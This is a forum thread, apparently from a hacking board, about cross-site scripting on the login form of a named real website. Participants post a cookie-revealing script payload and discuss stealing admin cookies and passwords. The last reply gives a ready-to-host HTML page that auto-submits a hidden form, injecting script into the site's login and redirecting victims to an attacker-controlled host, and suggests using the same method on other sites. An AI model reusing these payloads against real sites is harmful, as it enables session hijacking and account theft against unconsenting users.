another question for xss

well

if u try to put some string like this

Code:

"><script>alert(document.cookie)</script> 

on nick+login in that site



http://www.proplay.ru/




result:







Another site:







my question:


You think that can be exploitable?

 

Just if request method is get, because method post is invisible.

 

I have found many site vulnerable to xss on admin (user) login,and I think that using some cookie sniffer can be done something.


thx for your answer Mr.NOmeR1 (you are right)

 

Even if the request method is post, you can write a PHP script to post the data, and it will be still exploitable. If I am wrong, correct me =)

 

you can use post (it will be better)
you can get admin's passwd ( use javascript)
sorry for my english

 

You're right, but there isn't a neccessity to write php script, you can use just javascript and html

 

http://www.proplay.ru/

- method GET not supported
- no referer-control


http://yourhost.xz/g.html - link with XSS-exploit

file g.html

Code:

<body onload='document.forms[0].submit()'>
<form method="post" action="http://www.proplay.ru/users/login/">
<input name="name" value='"><script>alert(document.cookie);document.location.href=\"http://yourhost.xz/q.html\";</script>' style="visibility:hidden;display:none">
</form>

redirect -->> q.html with any content

Another site -->> by analogy